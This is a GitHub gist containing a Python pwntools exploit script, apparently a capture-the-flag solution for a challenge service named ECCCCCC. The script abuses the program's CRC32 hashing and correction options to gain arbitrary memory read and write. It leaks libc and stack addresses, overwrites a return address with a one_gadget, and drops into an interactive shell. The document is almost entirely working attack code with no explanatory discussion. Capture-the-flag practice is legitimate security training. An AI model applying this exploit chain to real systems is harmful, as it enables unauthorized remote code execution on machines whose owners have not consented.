Created
June 3, 2022 12:33
-
-
Save X3eRo0/85728c257fb8779564e8eeffe9f64ba5 to your computer and use it in GitHub Desktop.
ECCCCCC.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# this exploit was generated via | |
# 1) pwntools | |
# 2) ctfmate | |
import os | |
import time | |
import zlib | |
import pwn | |
import subprocess | |
SLEEP_TIME = 0.5 | |
# Set up pwntools for the correct architecture | |
exe = pwn.context.binary = pwn.ELF('./ECCCCCC') | |
libc = pwn.ELF("./libc.so.6") | |
pwn.context.terminal = ["tilix", "-t", "CTFMate", "-a", "session-add-right", "-e"] | |
pwn.context.delete_corefiles = True | |
pwn.context.rename_corefiles = False | |
host = pwn.args.HOST or 'ECCCCCC.pwn.so' | |
port = int(pwn.args.PORT or 65505) | |
def local(argv=[], *a, **kw): | |
'''Execute the target binary locally''' | |
if pwn.args.GDB: | |
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) | |
else: | |
return pwn.process([exe.path] + argv, *a, **kw) | |
def remote(argv=[], *a, **kw): | |
'''Connect to the process on the remote host''' | |
io = pwn.connect(host, port) | |
if pwn.args.GDB: | |
pwn.gdb.attach(io, gdbscript=gdbscript) | |
return io | |
def start(argv=[], *a, **kw): | |
'''Start the exploit against the target.''' | |
if pwn.args.LOCAL: | |
return local(argv, *a, **kw) | |
else: | |
return remote(argv, *a, **kw) | |
gdbscript = ''' | |
continue | |
'''.format(**locals()) | |
io = None | |
def GetOffsetStdin(): | |
log_level = pwn.context.log_level | |
pwn.context.log_level = 'critical' | |
p = pwn.process(exe.path) | |
p.sendline(pwn.cyclic(512)) | |
p.wait() | |
time.sleep(2) | |
core = p.corefile | |
fault = core.fault_addr | |
ofst = pwn.cyclic_find(fault & 0xffffffff) | |
p.close() | |
pwn.context.log_level = log_level | |
return ofst | |
def GetOffsetArgv(): | |
log_level = pwn.context.log_level | |
pwn.context.log_level = 'critical' | |
p = pwn.process([exe.path, pwn.cyclic(512)]) | |
p.wait() | |
time.sleep(2) | |
core = p.corefile | |
fault = core.fault_addr | |
ofst = pwn.cyclic_find(fault & 0xffffffff) | |
p.close() | |
pwn.context.log_level = log_level | |
return ofst | |
io = start() | |
def RevCRC32(hash): | |
# source : https://github.com/theonlypwner/crc32 | |
v0 = subprocess.check_output(["python", "./crc32.py", "reverse", hex(hash)]) | |
v0 = bytearray([int(v, 16) for v in v0.split(b"\n")[0][v0.index(b"{")+1:-1].split(b",")]) | |
return v0 | |
# =========================================================== | |
# EXPLOIT GOES HERE | |
# =========================================================== | |
def ExOption(v): | |
time.sleep(SLEEP_TIME) | |
io.sendlineafter(b"Option: ", b"%d" % v) | |
def SetRegion(addr, len): | |
time.sleep(SLEEP_TIME) | |
io.sendlineafter(b"Begin: ", b"%x" % addr) | |
io.sendlineafter(b"Length: ", b"%d" % len) | |
def ArbRead(addr): | |
ExOption(1) | |
SetRegion(addr, 4) | |
io.recvuntil(b"hash: ") | |
leak = int(io.recvline(), 16) | |
return leak | |
def WriteSingleByte(addr, b): | |
val = ArbRead(addr) | |
rev = RevCRC32(val) | |
rev[0] = b | |
newcrc32 = zlib.crc32(rev) | |
ExOption(2) | |
SetRegion(addr, 4) | |
io.sendlineafter(b"Correct hash: ", b"%d" % newcrc32) | |
if io.recvline() != b"Succesfully corrected the data!\n": | |
pwn.error("Failed to write 0x%x at 0x%x" % (b, addr)) | |
def ArbWrite(addr, data): | |
for i in range(len(data)): | |
WriteSingleByte(addr+i, data[i]) | |
return 0 | |
def Leak(addr, size=8): | |
if size==8: | |
return pwn.u64(RevCRC32(ArbRead(addr)) + RevCRC32(ArbRead(addr + 4))) | |
elif size==4: | |
return pwn.u32(RevCRC32(ArbRead(addr))) | |
PUTS_GOT_ADDR = 0x403fc0 | |
libc.address = Leak(PUTS_GOT_ADDR) - libc.symbols['puts'] | |
stack = Leak(libc.symbols.environ) | |
retaddr = stack - 0x100 | |
pwn.info("Libc : 0x%x" % libc.address) | |
pwn.info("Stack : 0x%x" % stack) | |
pwn.info("retaddr : 0x%x" % retaddr) | |
ArbWrite(retaddr, pwn.p64(libc.address + 0xe3b31)) | |
ExOption(0) | |
io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment